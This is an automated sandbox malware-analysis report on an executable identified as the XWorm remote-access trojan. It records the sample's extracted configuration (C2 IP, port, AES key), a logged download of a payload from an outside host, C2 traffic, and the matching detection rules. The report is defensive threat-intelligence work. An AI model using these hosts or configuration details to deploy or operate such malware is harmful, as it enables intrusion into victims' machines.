Edit tour

Windows Analysis Report
103__Installer.exe

Overview

General Information

Sample name:	103__Installer.exe
Analysis ID:	1466314
MD5:	fba295e75a2c2fd0f205da0a14b76859
SHA1:	5f26b9001c0482f1018ce153e58caf61e80ecb8f
SHA256:	86ed9f7125ae452d28f9eabd11f5cc9bef747fb751a5aa1283a0ab24952cf508
Tags:	exe
Infos:

Detection

XWorm

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic

Yara detected XWorm

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Machine Learning detection for sample

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Sample uses string decryption to hide its real strings

Uses known network protocols on non-standard ports

AV process strings found (often used to terminate AV products)

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

103__Installer.exe (PID: 7572 cmdline: "C:\Users\user\Desktop\103__Installer.exe" MD5: FBA295E75A2C2FD0F205DA0A14B76859)

WerFault.exe (PID: 4588 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7572 -s 2096 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
XWorm	Malware with wide range of capabilities ranging from RAT to ransomware.	No Attribution	https://any.run/cybersecurity-blog/xworm-malware-communication-analysis/ https://any.run/cybersecurity-blog/xworm-technical-analysis-of-a-new-malware-version/ https://blog.cyble.com/2022/08/19/evilcoder-project-selling-multiple-dangerous-tools-online/ https://cert.pl/en/posts/2023/10/deworming-the-xworm/ https://embee-research.ghost.io/infrastructure-analysis-with-dns-pivoting/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["59.56.110.103"], "Port": "7000", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x11dd2:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\Public\Downloads\ind.jpg	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0xff91:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\103[1].ccp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0xff91:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.3334563354.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0xff91:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
00000000.00000002.3335683213.0000000005F70000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000000.00000002.3335683213.0000000005F70000.00000004.08000000.00040000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x6c80:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x6d1d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x6e32:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x6af2:$cnc4: POST / HTTP/1.1
00000000.00000002.3335128746.0000000003DB1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Process Memory Space: 103__Installer.exe PID: 7572	JoeSecurity_XWorm	Yara detected XWorm	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.103__Installer.exe.5f70000.1.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0.2.103__Installer.exe.5f70000.1.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x6c80:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x6d1d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x6e32:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x6af2:$cnc4: POST / HTTP/1.1
0.2.103__Installer.exe.5f70000.1.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0.2.103__Installer.exe.5f70000.1.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x4e80:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x4f1d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x5032:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x4cf2:$cnc4: POST / HTTP/1.1

Snort Signatures

ETPRO TROJAN Win32/XWorm CnC PING Command Inbound M2 - Source IP: 59.56.110.103 - Destination IP: 192.168.2.10

Timestamp:	07/02/24-19:27:48.531831
SID:	2852874
Source Port:	7000
Destination Port:	49708
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) - Source IP: 192.168.2.10 - Destination IP: 59.56.110.103

Timestamp:	07/02/24-19:28:02.641410
SID:	2852923
Source Port:	49708
Destination Port:	7000
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound - Source IP: 192.168.2.10 - Destination IP: 59.56.110.103

Timestamp:	07/02/24-19:26:31.035751
SID:	2853193
Source Port:	49708
Destination Port:	7000
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound - Source IP: 192.168.2.10 - Destination IP: 59.56.110.103

Timestamp:	07/02/24-19:25:03.851820
SID:	2855924
Source Port:	49708
Destination Port:	7000
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes - Source IP: 59.56.110.103 - Destination IP: 192.168.2.10

Timestamp:	07/02/24-19:28:02.635547
SID:	2852870
Source Port:	7000
Destination Port:	49708
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000000.00000002.3335128746.0000000003DB1000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Xworm {"C2 url": ["59.56.110.103"], "Port": "7000", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}

Multi AV Scanner detection for submitted file

Source: 103__Installer.exe

ReversingLabs: Detection: 21%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: 103__Installer.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 0.2.103__Installer.exe.5f70000.1.raw.unpack	String decryptor: 59.56.110.103
Source: 0.2.103__Installer.exe.5f70000.1.raw.unpack	String decryptor: 7000
Source: 0.2.103__Installer.exe.5f70000.1.raw.unpack	String decryptor: <123456789>
Source: 0.2.103__Installer.exe.5f70000.1.raw.unpack	String decryptor: <Xwormmm>
Source: 0.2.103__Installer.exe.5f70000.1.raw.unpack	String decryptor: XWorm V5.6
Source: 0.2.103__Installer.exe.5f70000.1.raw.unpack	String decryptor: USB.exe

Source: 103__Installer.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 103__Installer.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: 103__Installer.exe, 00000000.00000002.3336013901.00000000063AC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdbMZ source: WER5186.tmp.dmp.16.dr
Source:	Binary string: System.Core.pdbP source: WER5186.tmp.dmp.16.dr
Source:	Binary string: System.Xml.ni.pdb source: WER5186.tmp.dmp.16.dr
Source:	Binary string: \??\C:\Windows\dll\mscorlib.pdb source: 103__Installer.exe, 00000000.00000002.3336013901.0000000006393000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.ni.pdbRSDS source: WER5186.tmp.dmp.16.dr
Source:	Binary string: \??\C:\Windows\mscorlib.pdbW source: 103__Installer.exe, 00000000.00000002.3334093675.0000000001559000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.ni.pdb source: WER5186.tmp.dmp.16.dr
Source:	Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb<R source: 103__Installer.exe, 00000000.00000002.3336013901.0000000006380000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: 103__Installer.exe, 00000000.00000002.3334093675.000000000149E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdbRSDS source: WER5186.tmp.dmp.16.dr
Source:	Binary string: System.pdb@b source: WER5186.tmp.dmp.16.dr
Source:	Binary string: System.Configuration.pdb source: WER5186.tmp.dmp.16.dr
Source:	Binary string: HPmo0C:\Windows\mscorlib.pdb source: 103__Installer.exe, 00000000.00000002.3335977071.000000000627A000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Xml.pdb source: WER5186.tmp.dmp.16.dr
Source:	Binary string: System.pdb source: WER5186.tmp.dmp.16.dr
Source:	Binary string: System.Xml.ni.pdbRSDS# source: WER5186.tmp.dmp.16.dr
Source:	Binary string: Microsoft.VisualBasic.pdb source: WER5186.tmp.dmp.16.dr
Source:	Binary string: System.Core.ni.pdb source: WER5186.tmp.dmp.16.dr
Source:	Binary string: gmscoBB.pdbc source: 103__Installer.exe, 00000000.00000002.3335977071.000000000627A000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: %%.pdb source: 103__Installer.exe, 00000000.00000002.3335977071.000000000627A000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Windows.Forms.pdb source: WER5186.tmp.dmp.16.dr
Source:	Binary string: ?yoC:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: 103__Installer.exe, 00000000.00000002.3335977071.000000000627A000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb source: 103__Installer.exe, 00000000.00000002.3334093675.000000000156B000.00000004.00000020.00020000.00000000.sdmp, WER5186.tmp.dmp.16.dr
Source:	Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: 103__Installer.exe, 00000000.00000002.3336013901.0000000006380000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb[ source: 103__Installer.exe, 00000000.00000002.3335977071.000000000627A000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Management.ni.pdbRSDSJ< source: WER5186.tmp.dmp.16.dr
Source:	Binary string: @yo.pdb source: 103__Installer.exe, 00000000.00000002.3335977071.000000000627A000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Drawing.pdb source: WER5186.tmp.dmp.16.dr
Source:	Binary string: System.Management.pdb source: WER5186.tmp.dmp.16.dr
Source:	Binary string: mscorlib.ni.pdb source: WER5186.tmp.dmp.16.dr
Source:	Binary string: System.Management.ni.pdb source: WER5186.tmp.dmp.16.dr
Source:	Binary string: \??\C:\Windows\mscorlib.pdb source: 103__Installer.exe, 00000000.00000002.3334093675.0000000001559000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdb source: WER5186.tmp.dmp.16.dr
Source:	Binary string: symbols\dll\mscorlib.pdbLb source: 103__Installer.exe, 00000000.00000002.3335977071.000000000627A000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: Microsoft.VisualBasic.pdb( source: WER5186.tmp.dmp.16.dr
Source:	Binary string: System.Configuration.ni.pdbRSDScUN source: WER5186.tmp.dmp.16.dr
Source:	Binary string: mscorlib.pdb246122658-3693405117-2476756634-1003_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32tM source: 103__Installer.exe, 00000000.00000002.3336013901.00000000063AC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: B.pdbc source: 103__Installer.exe, 00000000.00000002.3335977071.000000000627A000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.ni.pdb source: WER5186.tmp.dmp.16.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WER5186.tmp.dmp.16.dr

Source: C:\Users\user\Desktop\103__Installer.exe	File opened: C:\Windows\SysWOW64\avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\103__Installer.exe	File opened: C:\Windows\SysWOW64\MSVFW32.dll	Jump to behavior
Source: C:\Users\user\Desktop\103__Installer.exe	File opened: C:\Windows\SysWOW64\en-US\MSVFW32.dll.mui	Jump to behavior
Source: C:\Users\user\Desktop\103__Installer.exe	File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\diasymreader.dll	Jump to behavior
Source: C:\Users\user\Desktop\103__Installer.exe	File opened: C:\Windows\SysWOW64\en-US\avicap32.dll.mui	Jump to behavior
Source: C:\Users\user\Desktop\103__Installer.exe	File opened: C:\Windows\SysWOW64\wbem\en-US\wmiutils.dll.mui	Jump to behavior

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2855924 ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound 192.168.2.10:49708 -> 59.56.110.103:7000
Source: Traffic	Snort IDS: 2852870 ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes 59.56.110.103:7000 -> 192.168.2.10:49708
Source: Traffic	Snort IDS: 2852923 ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) 192.168.2.10:49708 -> 59.56.110.103:7000
Source: Traffic	Snort IDS: 2852874 ETPRO TROJAN Win32/XWorm CnC PING Command Inbound M2 59.56.110.103:7000 -> 192.168.2.10:49708
Source: Traffic	Snort IDS: 2853193 ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound 192.168.2.10:49708 -> 59.56.110.103:7000

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: 59.56.110.103

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 881
Source: unknown	Network traffic detected: HTTP traffic on port 881 -> 49707

Source: global traffic	TCP traffic: 192.168.2.10:49707 -> 91.208.240.157:881
Source: global traffic	TCP traffic: 192.168.2.10:49708 -> 59.56.110.103:7000

Source: Joe Sandbox View

IP Address: 91.208.240.157 91.208.240.157

Source: Joe Sandbox View

ASN Name: CHINATELECOM-FUJIAN-FUZHOU-IDC1FuzhouCN CHINATELECOM-FUJIAN-FUZHOU-IDC1FuzhouCN

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\103__Installer.exe

Code function: 0_2_00B725AD __EH_prolog,InternetReadFile,

0_2_00B725AD

Source: global traffic

HTTP traffic detected: GET /103.ccp HTTP/1.1User-Agent: DownloadHost: guanlix.cn:881Cache-Control: no-cache

Source: global traffic

DNS traffic detected: DNS query: guanlix.cn

Source: 103__Installer.exe	String found in binary or memory: http://guanlix.cn:881/103.ccp
Source: 103__Installer.exe, 00000000.00000002.3334093675.00000000014F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://guanlix.cn:881/103.ccpq
Source: 103__Installer.exe, 00000000.00000002.3335128746.0000000003DB1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Amcache.hve.16.dr	String found in binary or memory: http://upx.sf.net

System Summary

Malicious sample detected (through community Yara rule)

Source: dump.pcap, type: PCAP	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 0.2.103__Installer.exe.5f70000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.103__Installer.exe.5f70000.1.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000000.00000002.3334563354.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000000.00000002.3335683213.0000000005F70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\Public\Downloads\ind.jpg, type: DROPPED	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\103[1].ccp, type: DROPPED	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown

Source: C:\Users\user\Desktop\103__Installer.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\103__Installer.exe	Code function: 0_2_00B8000E	0_2_00B8000E
Source: C:\Users\user\Desktop\103__Installer.exe	Code function: 0_2_00B85A2A	0_2_00B85A2A
Source: C:\Users\user\Desktop\103__Installer.exe	Code function: 0_2_00B803AC	0_2_00B803AC
Source: C:\Users\user\Desktop\103__Installer.exe	Code function: 0_2_00B8738F	0_2_00B8738F
Source: C:\Users\user\Desktop\103__Installer.exe	Code function: 0_2_00B7FB79	0_2_00B7FB79
Source: C:\Users\user\Desktop\103__Installer.exe	Code function: 0_2_00B80B66	0_2_00B80B66
Source: C:\Users\user\Desktop\103__Installer.exe	Code function: 0_2_00B854D9	0_2_00B854D9
Source: C:\Users\user\Desktop\103__Installer.exe	Code function: 0_2_00B86657	0_2_00B86657
Source: C:\Users\user\Desktop\103__Installer.exe	Code function: 0_2_00B85F7B	0_2_00B85F7B
Source: C:\Users\user\Desktop\103__Installer.exe	Code function: 0_2_00B8077E	0_2_00B8077E
Source: C:\Users\user\Desktop\103__Installer.exe	Code function: 0_2_00B87F4F	0_2_00B87F4F
Source: C:\Users\user\Desktop\103__Installer.exe	Code function: 0_2_05F855D8	0_2_05F855D8
Source: C:\Users\user\Desktop\103__Installer.exe	Code function: 0_2_05F8A6B8	0_2_05F8A6B8
Source: C:\Users\user\Desktop\103__Installer.exe	Code function: 0_2_05F8B3F8	0_2_05F8B3F8
Source: C:\Users\user\Desktop\103__Installer.exe	Code function: 0_2_05F8ED84	0_2_05F8ED84
Source: C:\Users\user\Desktop\103__Installer.exe	Code function: 0_2_05F84D08	0_2_05F84D08
Source: C:\Users\user\Desktop\103__Installer.exe	Code function: 0_2_05F807A0	0_2_05F807A0
Source: C:\Users\user\Desktop\103__Installer.exe	Code function: 0_2_05F849C0	0_2_05F849C0

Source: C:\Users\user\Desktop\103__Installer.exe

Code function: String function: 00B7A940 appears 44 times

Source: C:\Users\user\Desktop\103__Installer.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7572 -s 2096

Source: 103__Installer.exe, 00000000.00000002.3335683213.0000000005F70000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameXClient.exe4 vs 103__Installer.exe
Source: 103__Installer.exe, 00000000.00000000.1236310845.0000000000B93000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamewindos.exe. vs 103__Installer.exe
Source: 103__Installer.exe	Binary or memory string: OriginalFilenamewindos.exe. vs 103__Installer.exe

Source: 103__Installer.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: dump.pcap, type: PCAP	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 0.2.103__Installer.exe.5f70000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.103__Installer.exe.5f70000.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000002.3334563354.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000000.00000002.3335683213.0000000005F70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\Public\Downloads\ind.jpg, type: DROPPED	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\103[1].ccp, type: DROPPED	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13

Source: 0.2.103__Installer.exe.5f70000.1.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.103__Installer.exe.5f70000.1.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.103__Installer.exe.5f70000.1.raw.unpack, AlgorithmAES.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: classification engine

Classification label: mal100.troj.evad.winEXE@2/7@1/2

Source: C:\Users\user\Desktop\103__Installer.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\103[1].ccp

Jump to behavior

Source: C:\Users\user\Desktop\103__Installer.exe	Mutant created: NULL
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7572
Source: C:\Users\user\Desktop\103__Installer.exe	Mutant created: \Sessions\1\BaseNamedObjects\tJeTNPzvlX6aPF3G

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\3f431b1f-d465-427a-8041-737422ee2c5f

Jump to behavior

Source: 103__Installer.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\103__Installer.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 103__Installer.exe

ReversingLabs: Detection: 21%

Source: unknown	Process created: C:\Users\user\Desktop\103__Installer.exe "C:\Users\user\Desktop\103__Installer.exe"
Source: C:\Users\user\Desktop\103__Installer.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7572 -s 2096

Source: C:\Users\user\Desktop\103__Installer.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\103__Installer.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\103__Installer.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\103__Installer.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\103__Installer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\103__Installer.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\103__Installer.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\103__Installer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\103__Installer.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\103__Installer.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\103__Installer.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\103__Installer.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\103__Installer.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\103__Installer.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\103__Installer.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\103__Installer.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\103__Installer.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\103__Installer.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\103__Installer.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\103__Installer.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\103__Installer.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\103__Installer.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\103__Installer.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\103__Installer.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\103__Installer.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\103__Installer.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\103__Installer.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\103__Installer.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\103__Installer.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\103__Installer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\103__Installer.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\103__Installer.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\103__Installer.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\103__Installer.exe	Section loaded: winmm.dll	Jump to behavior

Source: C:\Users\user\Desktop\103__Installer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\103__Installer.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: 103__Installer.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: 103__Installer.exe, 00000000.00000002.3336013901.00000000063AC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdbMZ source: WER5186.tmp.dmp.16.dr
Source:	Binary string: System.Core.pdbP source: WER5186.tmp.dmp.16.dr
Source:	Binary string: System.Xml.ni.pdb source: WER5186.tmp.dmp.16.dr
